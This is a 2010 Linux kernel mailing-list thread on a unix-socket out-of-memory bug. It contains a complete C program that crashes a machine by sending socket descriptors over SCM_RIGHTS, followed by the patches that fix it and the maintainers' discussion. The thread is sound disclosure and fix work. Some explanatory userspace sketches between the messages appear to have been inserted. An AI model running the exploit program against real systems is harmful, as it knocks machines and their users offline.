* Re: Unix socket local DOS (OOM)
[not found] <AANLkTi=Q967xpX0KLMwX-=_4_1AKO5wjHEuJ1TrNjCj9@mail.gmail.com>
@ 2010-11-23 23:11 ` Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
` (2 more replies)
0 siblings, 3 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-23 23:11 UTC
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
On Tuesday 23 November 2010 at 23:21 +0100, Vegard Nossum wrote:
> Hi,
>
> I found this program lying around on my laptop. It kills my box
> (2.6.35) instantly by consuming a lot of memory (allocated by the
> kernel, so the process doesn't get killed by the OOM killer). As far
> as I can tell, the memory isn't being freed when the program exits
> either. Maybe it will eventually get cleaned up by the UNIX socket
> garbage collector thing, but in that case it doesn't get called
> quickly enough to save my machine at least.
>
> #include <sys/mount.h>
> #include <sys/socket.h>
> #include <sys/un.h>
> #include <sys/wait.h>
>
> #include <errno.h>
> #include <fcntl.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> static int send_fd(int unix_fd, int fd)
> {
> 	struct msghdr msgh;
> 	struct cmsghdr *cmsg;
> 	char buf[CMSG_SPACE(sizeof(fd))];
>
> 	memset(&msgh, 0, sizeof(msgh));
>
> 	memset(buf, 0, sizeof(buf));
> 	msgh.msg_control = buf;
> 	msgh.msg_controllen = sizeof(buf);
>
> 	cmsg = CMSG_FIRSTHDR(&msgh);
> 	cmsg->cmsg_len = CMSG_LEN(sizeof(fd));
> 	cmsg->cmsg_level = SOL_SOCKET;
> 	cmsg->cmsg_type = SCM_RIGHTS;
>
> 	msgh.msg_controllen = cmsg->cmsg_len;
>
> 	memcpy(CMSG_DATA(cmsg), &fd, sizeof(fd));
> 	return sendmsg(unix_fd, &msgh, 0);
> }
>
> int main(int argc, char *argv[])
> {
> 	while (1) {
> 		pid_t child;
>
> 		child = fork();
> 		if (child == -1)
> 			exit(EXIT_FAILURE);
>
> 		if (child == 0) {
> 			int fd[2];
> 			int i;
>
> 			if (socketpair(PF_UNIX, SOCK_SEQPACKET, 0, fd) == -1)
> 				goto out_error;
>
> 			for (i = 0; i < 100; ++i) {
> 				if (send_fd(fd[0], fd[0]) == -1)
> 					goto out_error;
>
> 				if (send_fd(fd[1], fd[1]) == -1)
> 					goto out_error;
> 			}
>
> 			close(fd[0]);
> 			close(fd[1]);
> 			goto out;
>
> out_error:
> 			fprintf(stderr, "error: %s\n", strerror(errno));
> out:
> 			exit(EXIT_SUCCESS);
> 		}
>
> 		while (1) {
> 			pid_t kid;
> 			int status;
>
> 			kid = wait(&status);
> 			if (kid == -1) {
> 				if (errno == ECHILD)
> 					break;
> 				if (errno == EINTR)
> 					continue;
>
> 				exit(EXIT_FAILURE);
> 			}
>
> 			if (WIFEXITED(status)) {
> 				if (WEXITSTATUS(status))
> 					exit(WEXITSTATUS(status));
> 				break;
> 			}
> 		}
> 	}
>
> 	return EXIT_SUCCESS;
> }
>
>
> Vegard
> --
Hi Vegard,

Do you have a patch to correct this problem?

I suppose we should add a machine-wide limit on the number of pending
struct scm_fp_list allocations (using a percpu_counter, I guess).

David, commit f8d570a4 added one "struct list_head list;" to struct
scm_fp_list, which doubled its allocation size because kmalloc() rounds
up to power-of-two sizes (2048 bytes instead of 1024 on 32bit arches,
4096 instead of 2048 on 64bit arches).

Could we lower SCM_MAX_FD from 255 to 253?
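
The size effect discussed in this message can be checked in userspace. What follows is a minimal sketch, not kernel code: the three structs are hand-written mirrors of the scm_fp_list layout (before commit f8d570a4, after it, and with the slot count lowered to 253), list_head_mirror stands in for struct list_head, and round_up_pow2() is a hypothetical helper that only approximates kmalloc()'s power-of-two size classes.

```c
#include <assert.h>
#include <stddef.h>

/* Userspace stand-in for the kernel's struct list_head (two pointers). */
struct list_head_mirror {
	struct list_head_mirror *next, *prev;
};

/* Layout before commit f8d570a4: no list head, 255 slots. */
struct fp_list_old {
	int count;
	void *fp[255];
};

/* Layout after commit f8d570a4: list head added, still 255 slots. */
struct fp_list_255 {
	struct list_head_mirror list;
	int count;
	void *fp[255];
};

/* Same layout with the slot count lowered to 253. */
struct fp_list_253 {
	struct list_head_mirror list;
	int count;
	void *fp[253];
};

/*
 * Hypothetical helper: smallest power of two >= n, used here as a rough
 * model of the size class a kmalloc(n) request ends up in.
 */
static size_t round_up_pow2(size_t n)
{
	size_t size = 1;

	while (size < n)
		size <<= 1;
	return size;
}

/* Check that two fewer slots bring the allocation back to the old class. */
static void check_size_classes(void)
{
	size_t before = round_up_pow2(sizeof(struct fp_list_old));
	size_t with_255 = round_up_pow2(sizeof(struct fp_list_255));
	size_t with_253 = round_up_pow2(sizeof(struct fp_list_253));

	assert(with_255 == 2 * before);	/* the list head doubled the class */
	assert(with_253 == before);	/* 253 slots fit the old class again */
}
```

Calling check_size_classes() passes on common 32-bit and 64-bit ABIs, where the list head is two pointers wide: removing two pointer-sized slots exactly pays for it.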
* Re: Unix socket local DOS (OOM)
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
@ 2010-11-23 23:25 ` Vegard Nossum
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2 siblings, 0 replies; 12+ messages in thread
From: Vegard Nossum @ 2010-11-23 23:25 UTC
To: Eric Dumazet; +Cc: David Miller, LKML, Andrew Morton, Eugene Teo, netdev
On 24 November 2010 00:11, Eric Dumazet <eric.dumazet@gmail.com> wrote:
> On Tuesday 23 November 2010 at 23:21 +0100, Vegard Nossum wrote:
>> Hi,
>>
>> I found this program lying around on my laptop. It kills my box
>> (2.6.35) instantly by consuming a lot of memory (allocated by the
>> kernel, so the process doesn't get killed by the OOM killer). As far
>> as I can tell, the memory isn't being freed when the program exits
>> either. Maybe it will eventually get cleaned up by the UNIX socket
>> garbage collector thing, but in that case it doesn't get called
>> quickly enough to save my machine at least.
>
> Hi Vegard
>
> Do you have a patch to correct this problem ?
No, sorry, I didn't look into it.
Vegard
* [PATCH net-next-2.6] scm: lower SCM_MAX_FD
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
@ 2010-11-24 0:09 ` Eric Dumazet
2010-11-24 19:17 ` David Miller
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2 siblings, 1 reply; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 0:09 UTC
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
> David, commit f8d570a4 added one "struct list_head list;" to struct
> scm_fp_list, which doubled its allocation size because kmalloc() rounds
> up to power-of-two sizes (2048 bytes instead of 1024 on 32bit arches,
> 4096 instead of 2048 on 64bit arches).
>
> We might lower SCM_MAX_FD from 255 to 253 ?
>
>
This won't fix the problem Vegard reported yet, but the following patch
should reduce RAM usage a lot (32 bytes instead of 2048 bytes per scm in
Vegard's test program).

Thanks

[PATCH net-next-2.6] net: scm: lower SCM_MAX_FD

Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
halved. (commit f8d570a4 added two pointers in this structure)

scm_fp_dup() should not copy the whole structure (and trigger kmemcheck
warnings), but only the used part. While we are at it, only allocate
the needed size.

Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
---
include/net/scm.h | 5 +++--
net/core/scm.c | 10 ++++++----
2 files changed, 9 insertions(+), 6 deletions(-)
diff --git a/include/net/scm.h b/include/net/scm.h
index 3165650..745460f 100644
--- a/include/net/scm.h
+++ b/include/net/scm.h
@@ -10,11 +10,12 @@
 /* Well, we should have at least one descriptor open
  * to accept passed FDs 8)
  */
-#define SCM_MAX_FD 255
+#define SCM_MAX_FD 253
 
 struct scm_fp_list {
 	struct list_head list;
-	int count;
+	short count;
+	short max;
 	struct file *fp[SCM_MAX_FD];
 };
 
diff --git a/net/core/scm.c b/net/core/scm.c
index 413cab8..bbe4544 100644
--- a/net/core/scm.c
+++ b/net/core/scm.c
@@ -79,10 +79,11 @@ static int scm_fp_copy(struct cmsghdr *cmsg, struct scm_fp_list **fplp)
 			return -ENOMEM;
 		*fplp = fpl;
 		fpl->count = 0;
+		fpl->max = SCM_MAX_FD;
 	}
 	fpp = &fpl->fp[fpl->count];
 
-	if (fpl->count + num > SCM_MAX_FD)
+	if (fpl->count + num > fpl->max)
 		return -EINVAL;
 
 	/*
@@ -331,11 +332,12 @@ struct scm_fp_list *scm_fp_dup(struct scm_fp_list *fpl)
 	if (!fpl)
 		return NULL;
 
-	new_fpl = kmalloc(sizeof(*fpl), GFP_KERNEL);
+	new_fpl = kmemdup(fpl, offsetof(struct scm_fp_list, fp[fpl->count]),
+			  GFP_KERNEL);
 	if (new_fpl) {
-		for (i=fpl->count-1; i>=0; i--)
+		for (i = 0; i < fpl->count; i++)
 			get_file(fpl->fp[i]);
-		memcpy(new_fpl, fpl, sizeof(*fpl));
+		new_fpl->max = new_fpl->count;
 	}
 	return new_fpl;
 }
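
The "copy only the used part" idea in scm_fp_dup() can be illustrated outside the kernel. The following is a rough userspace sketch under stated assumptions: struct fp_list is a hypothetical mirror of the patched struct scm_fp_list, malloc() plus memcpy() stand in for kmemdup(), and the get_file() reference counting is left out entirely. The prefix size is computed as offsetof(..., fp) plus count slots, which is equivalent to the offsetof(..., fp[count]) expression in the patch but avoids a non-constant array index inside offsetof.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

#define MAX_SLOTS 253	/* mirrors SCM_MAX_FD after the patch */

/* Hypothetical userspace mirror of the patched struct scm_fp_list. */
struct fp_list {
	void *list[2];		/* stand-in for struct list_head */
	short count;		/* slots in use */
	short max;		/* slots this allocation can hold */
	void *fp[MAX_SLOTS];
};

/* Bytes needed for the header plus the first 'count' slots. */
static size_t fp_list_used_size(short count)
{
	return offsetof(struct fp_list, fp) + (size_t)count * sizeof(void *);
}

/*
 * Duplicate only the used prefix of 'fpl'. The copy has room for exactly
 * 'count' slots, so its 'max' is clamped to 'count' to stop later code
 * from appending past the end of the smaller allocation.
 */
static struct fp_list *fp_list_dup(const struct fp_list *fpl)
{
	size_t size;
	struct fp_list *new_fpl;

	if (!fpl)
		return NULL;

	assert(fpl->count >= 0 && fpl->count <= fpl->max);

	size = fp_list_used_size(fpl->count);
	new_fpl = malloc(size);
	if (new_fpl) {
		memcpy(new_fpl, fpl, size);
		new_fpl->max = new_fpl->count;
	}
	return new_fpl;
}
```

With one slot in use, fp_list_used_size(1) comes to 32 bytes on a typical 64-bit ABI and 16 bytes on a typical 32-bit one, which is where the per-message saving in Vegard's test program comes from.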
* [PATCH] af_unix: limit unix_tot_inflight
2010-11-23 23:11 ` Unix socket local DOS (OOM) Eric Dumazet
2010-11-23 23:25 ` Vegard Nossum
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24 9:18 ` Eric Dumazet
2010-11-24 14:44 ` Andi Kleen
2010-11-26 8:50 ` Michal Hocko
2 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 9:18 UTC
To: Vegard Nossum, David Miller; +Cc: LKML, Andrew Morton, Eugene Teo, netdev
On Wednesday 24 November 2010 at 00:11 +0100, Eric Dumazet wrote:
> On Tuesday 23 November 2010 at 23:21 +0100, Vegard Nossum wrote:
> > Hi,
> >
> > I found this program lying around on my laptop. It kills my box
> > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > kernel, so the process doesn't get killed by the OOM killer). As far
> > as I can tell, the memory isn't being freed when the program exits
> > either. Maybe it will eventually get cleaned up by the UNIX socket
> > garbage collector thing, but in that case it doesn't get called
> > quickly enough to save my machine at least.
Here is a patch to address this problem.

Thanks

[PATCH] af_unix: limit unix_tot_inflight

Vegard Nossum found that a unix socket OOM was possible and posted an
exploit program.

My analysis is that we can eat all LOWMEM memory before unix_gc() is
called from unix_release_sock(). Moreover, the thread blocked in
unix_gc() can take a huge amount of time to perform the cleanup because
of the huge working set.

One way to handle this is to put a sensible limit on unix_tot_inflight,
tested in wait_for_unix_gc(), and to force a call to unix_gc() if this
limit is hit.

This solves the OOM, also reduces overall latencies, and should not
slow down normal workloads.

Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Cc: Andrew Morton <akpm@linux-foundation.org>
Cc: Eugene Teo <eugene@redhat.com>
---
net/unix/garbage.c | 7 +++++++
1 files changed, 7 insertions(+)
diff --git a/net/unix/garbage.c b/net/unix/garbage.c
index c8df6fd..40df93d 100644
--- a/net/unix/garbage.c
+++ b/net/unix/garbage.c
@@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
 }
 
 static bool gc_in_progress = false;
+#define UNIX_INFLIGHT_TRIGGER_GC 16000
 
 void wait_for_unix_gc(void)
 {
+	/*
+	 * If number of inflight sockets is insane,
+	 * force a garbage collect right now.
+	 */
+	if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
+		unix_gc();
 	wait_event(unix_gc_wait, gc_in_progress == false);
 }
 
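
The effect of the added check can be modelled in a few lines of userspace C. This is only a sketch under simplifying assumptions: struct gc_model and the model_*() functions are hypothetical names, the model is single-threaded, the check is assumed to run before every send, and the model collector treats every inflight object as unreachable garbage (which is the situation the exploit program creates).

```c
#include <assert.h>
#include <stdbool.h>

#define INFLIGHT_TRIGGER_GC 16000	/* same value as UNIX_INFLIGHT_TRIGGER_GC */

/* Hypothetical single-threaded model of the collector state. */
struct gc_model {
	unsigned int tot_inflight;	/* stands in for unix_tot_inflight */
	bool gc_in_progress;
	unsigned int gc_runs;		/* number of forced collections */
};

/* Model collector: pretend every inflight object was garbage. */
static void model_gc(struct gc_model *m)
{
	assert(!m->gc_in_progress);
	m->gc_in_progress = true;
	m->tot_inflight = 0;
	m->gc_runs++;
	m->gc_in_progress = false;
}

/* Mirrors the check the patch adds at the top of wait_for_unix_gc(). */
static void model_wait_for_gc(struct gc_model *m)
{
	if (m->tot_inflight > INFLIGHT_TRIGGER_GC && !m->gc_in_progress)
		model_gc(m);
	/* The kernel would now sleep until gc_in_progress is false. */
}

/* Model sender: run the check, then put one more object in flight. */
static void model_send_fd(struct gc_model *m)
{
	model_wait_for_gc(m);
	m->tot_inflight++;
}
```

However many times model_send_fd() is called, tot_inflight never exceeds INFLIGHT_TRIGGER_GC + 1 in this model, because the check fires on the first send that finds the counter above the threshold.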
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
@ 2010-11-24 14:44 ` Andi Kleen
2010-11-24 15:18 ` Eric Dumazet
2010-11-26 8:50 ` Michal Hocko
1 sibling, 1 reply; 12+ messages in thread
From: Andi Kleen @ 2010-11-24 14:44 UTC
To: Eric Dumazet
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev
Eric Dumazet <eric.dumazet@gmail.com> writes:
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> }
>
> static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
It would be better to define this as a percentage of
lowmem.
-Andi
--
ak@linux.intel.com -- Speaking for myself only.
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 14:44 ` Andi Kleen
@ 2010-11-24 15:18 ` Eric Dumazet
2010-11-24 16:25 ` Andi Kleen
2010-11-24 17:14 ` David Miller
0 siblings, 2 replies; 12+ messages in thread
From: Eric Dumazet @ 2010-11-24 15:18 UTC
To: Andi Kleen
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev
On Wednesday 24 November 2010 at 15:44 +0100, Andi Kleen wrote:
> Eric Dumazet <eric.dumazet@gmail.com> writes:
> >
> > diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> > index c8df6fd..40df93d 100644
> > --- a/net/unix/garbage.c
> > +++ b/net/unix/garbage.c
> > @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> > }
> >
> > static bool gc_in_progress = false;
> > +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>
> It would be better to define this as a percentage of
> lowmem.
>
I knew somebody would suggest this ;)

Hmm, why bother?

Do you think 16000 is too big? Too small?

1) What would the percentage of memory be? 1%? 0.001%?

On a 16TB machine, a percentage would still give huge latencies to the
poor guy who hits unix_gc().

With 16000, the max latency I measured was 11.5 ms (on an Intel E5540
@2.53GHz), instead of more than 2000 ms.

I guess it would make more sense to limit this to the size of the CPU
cache anyway.

2) We currently allocate 4096 bytes (on x86_64) to store one file
pointer, or 2048 bytes on x86_32, although the same allocation can hold
up to 255 files.

I posted a patch to shrink this to 32 or 16 bytes. Should we then
change the heuristic?

3) Really, who needs more than 16000 inflight unix files?

(Inflight unix files are af_unix file descriptors that were sent
through af_unix (sendfd()) and have not been garbage collected yet.)

4) If we autotune a limit at boot time as a lowmem percentage, some guys
will then want a /proc/sys/net/core/max_unix_inflight sysctl, just for
completeness. One extra sysctl...

I can't see any valid uses, only programs designed to stress our stack.
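
For a sense of scale, the figures quoted in this message give a rough ceiling on the scm_fp_list memory that can be pinned at the threshold. This is back-of-the-envelope arithmetic rather than a measurement: pinned_bytes() is a hypothetical helper, it assumes one allocation per inflight file (as in the test program, which passes one descriptor per message), and it ignores sk_buff and socket overhead.

```c
#include <assert.h>

#define UNIX_INFLIGHT_TRIGGER_GC 16000UL

/*
 * Hypothetical helper: bytes of scm_fp_list memory pinned when 'inflight'
 * files are in flight and each one sits in its own allocation of
 * 'alloc_size' bytes.
 */
static unsigned long pinned_bytes(unsigned long inflight,
				  unsigned long alloc_size)
{
	return inflight * alloc_size;
}

/* Ceiling at the threshold for the x86_64 allocation sizes quoted above. */
static void check_threshold_bounds(void)
{
	/* 4096-byte allocations: 65536000 bytes, i.e. 62.5 MiB */
	assert(pinned_bytes(UNIX_INFLIGHT_TRIGGER_GC, 4096) == 65536000UL);
	/* 32-byte allocations: 512000 bytes, i.e. 500 KiB */
	assert(pinned_bytes(UNIX_INFLIGHT_TRIGGER_GC, 32) == 512000UL);
}
```

Under these assumptions the threshold and the smaller allocation combine: the first bounds how many objects accumulate before a collection is forced, the second shrinks what each of them costs.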
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 15:18 ` Eric Dumazet
@ 2010-11-24 16:25 ` Andi Kleen
2010-11-24 17:14 ` David Miller
1 sibling, 0 replies; 12+ messages in thread
From: Andi Kleen @ 2010-11-24 16:25 UTC
To: Eric Dumazet
Cc: Andi Kleen, Vegard Nossum, David Miller, LKML, Andrew Morton,
Eugene Teo, netdev
> I knew somebody would suggest this ;)
>
> Hmm, why bother ?
>
> Do you think 16000 is too big ? Too small ?
I just don't like static limits. Traditionally even the ones
that seemed reasonable at some point were hit by someone
years later.
The latency issue you mention is a valid concern. I guess
an incremental GC would be overkill here ...
-Andi
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 15:18 ` Eric Dumazet
2010-11-24 16:25 ` Andi Kleen
@ 2010-11-24 17:14 ` David Miller
1 sibling, 0 replies; 12+ messages in thread
From: David Miller @ 2010-11-24 17:14 UTC
To: eric.dumazet; +Cc: andi, vegard.nossum, linux-kernel, akpm, eugene, netdev
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 16:18:26 +0100
> 4) If we autotune a limit at boot time as a lowmem percentage, some guys
> then want a /proc/sys/net/core/max_unix_inflight sysctl , just for
> completeness. One extra sysctl...
>
> I cant see valid uses but programs designed to stress our stack.
I agree completely with Eric's analysis.
I would even consider setting this threshold lower. :-)
Anyways, consider Eric's patch applied.
* Re: [PATCH net-next-2.6] scm: lower SCM_MAX_FD
2010-11-24 0:09 ` [PATCH net-next-2.6] scm: lower SCM_MAX_FD Eric Dumazet
@ 2010-11-24 19:17 ` David Miller
0 siblings, 0 replies; 12+ messages in thread
From: David Miller @ 2010-11-24 19:17 UTC
To: eric.dumazet; +Cc: vegard.nossum, linux-kernel, akpm, eugene, netdev
From: Eric Dumazet <eric.dumazet@gmail.com>
Date: Wed, 24 Nov 2010 01:09:15 +0100
> [PATCH net-next-2.6] net: scm: lower SCM_MAX_FD
>
> Lower SCM_MAX_FD from 255 to 253 so that allocations for scm_fp_list are
> halved. (commit f8d570a4 added two pointers in this structure)
>
> scm_fp_dup() should not copy whole structure (and trigger kmemcheck
> warnings), but only the used part. While we are at it, only allocate
> needed size.
>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
Also applied, thanks Eric.
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-24 9:18 ` [PATCH] af_unix: limit unix_tot_inflight Eric Dumazet
2010-11-24 14:44 ` Andi Kleen
@ 2010-11-26 8:50 ` Michal Hocko
2010-11-27 2:27 ` David Miller
1 sibling, 1 reply; 12+ messages in thread
From: Michal Hocko @ 2010-11-26 8:50 UTC
To: stable
Cc: Vegard Nossum, David Miller, LKML, Andrew Morton, Eugene Teo,
netdev, Eric Dumazet
Shouldn't this go to stable?
AFAICS 2.6.32 contains the same code (the patch applies).
I haven't tried to reproduce the issue yet.
On Wed 24-11-10 10:18:55, Eric Dumazet wrote:
> On Wednesday 24 November 2010 at 00:11 +0100, Eric Dumazet wrote:
> > On Tuesday 23 November 2010 at 23:21 +0100, Vegard Nossum wrote:
> > > Hi,
> > >
> > > I found this program lying around on my laptop. It kills my box
> > > (2.6.35) instantly by consuming a lot of memory (allocated by the
> > > kernel, so the process doesn't get killed by the OOM killer). As far
> > > as I can tell, the memory isn't being freed when the program exits
> > > either. Maybe it will eventually get cleaned up by the UNIX socket
> > > garbage collector thing, but in that case it doesn't get called
> > > quickly enough to save my machine at least.
>
> Here is a patch to address this problem.
>
> Thanks
>
> [PATCH] af_unix: limit unix_tot_inflight
>
> Vegard Nossum found a unix socket OOM was possible, posting an exploit
> program.
>
> My analysis is we can eat all LOWMEM memory before unix_gc() being
> called from unix_release_sock(). Moreover, the thread blocked in
> unix_gc() can consume huge amount of time to perform cleanup because of
> huge working set.
>
> One way to handle this is to have a sensible limit on unix_tot_inflight,
> tested from wait_for_unix_gc() and to force a call to unix_gc() if this
> limit is hit.
>
> This solves the OOM and also reduce overall latencies, and should not
> slowdown normal workloads.
>
> Reported-by: Vegard Nossum <vegard.nossum@gmail.com>
> Signed-off-by: Eric Dumazet <eric.dumazet@gmail.com>
> Cc: Andrew Morton <akpm@linux-foundation.org>
> Cc: Eugene Teo <eugene@redhat.com>
> ---
> net/unix/garbage.c | 7 +++++++
> 1 files changed, 7 insertions(+)
>
> diff --git a/net/unix/garbage.c b/net/unix/garbage.c
> index c8df6fd..40df93d 100644
> --- a/net/unix/garbage.c
> +++ b/net/unix/garbage.c
> @@ -259,9 +259,16 @@ static void inc_inflight_move_tail(struct unix_sock *u)
> }
>
> static bool gc_in_progress = false;
> +#define UNIX_INFLIGHT_TRIGGER_GC 16000
>
> void wait_for_unix_gc(void)
> {
> + /*
> + * If number of inflight sockets is insane,
> + * force a garbage collect right now.
> + */
> + if (unix_tot_inflight > UNIX_INFLIGHT_TRIGGER_GC && !gc_in_progress)
> + unix_gc();
> wait_event(unix_gc_wait, gc_in_progress == false);
> }
>
--
Michal Hocko
L3 team
SUSE LINUX s.r.o.
Lihovarska 1060/12
190 00 Praha 9
Czech Republic
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-26 8:50 ` Michal Hocko
@ 2010-11-27 2:27 ` David Miller
2010-11-29 10:37 ` Michal Hocko
0 siblings, 1 reply; 12+ messages in thread
From: David Miller @ 2010-11-27 2:27 UTC
To: mhocko
Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev,
eric.dumazet
From: Michal Hocko <mhocko@suse.cz>
Date: Fri, 26 Nov 2010 09:50:00 +0100
> Shouldn't this go to stable?
> AFAICS 2.6.32 contains the same code (the patch applies).
> I haven't tried to reproduce the issue yet.
I'll submit it to all the stable branches after this patch (and the
other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
least half a week or so.
* Re: [PATCH] af_unix: limit unix_tot_inflight
2010-11-27 2:27 ` David Miller
@ 2010-11-29 10:37 ` Michal Hocko
0 siblings, 0 replies; 12+ messages in thread
From: Michal Hocko @ 2010-11-29 10:37 UTC
To: David Miller
Cc: stable, vegard.nossum, linux-kernel, akpm, eugene, netdev,
eric.dumazet
On Fri 26-11-10 18:27:14, David Miller wrote:
> From: Michal Hocko <mhocko@suse.cz>
> Date: Fri, 26 Nov 2010 09:50:00 +0100
>
> > Shouldn't this go to stable?
> > AFAICS 2.6.32 contains the same code (the patch applies).
> > I haven't tried to reproduce the issue yet.
>
> I'll submit it to all the stable branches after this patch (and the
> other AF_UNIX fixes recently proposed) have sat in Linus's tree for at
> least half a week or so.
OK, thanks!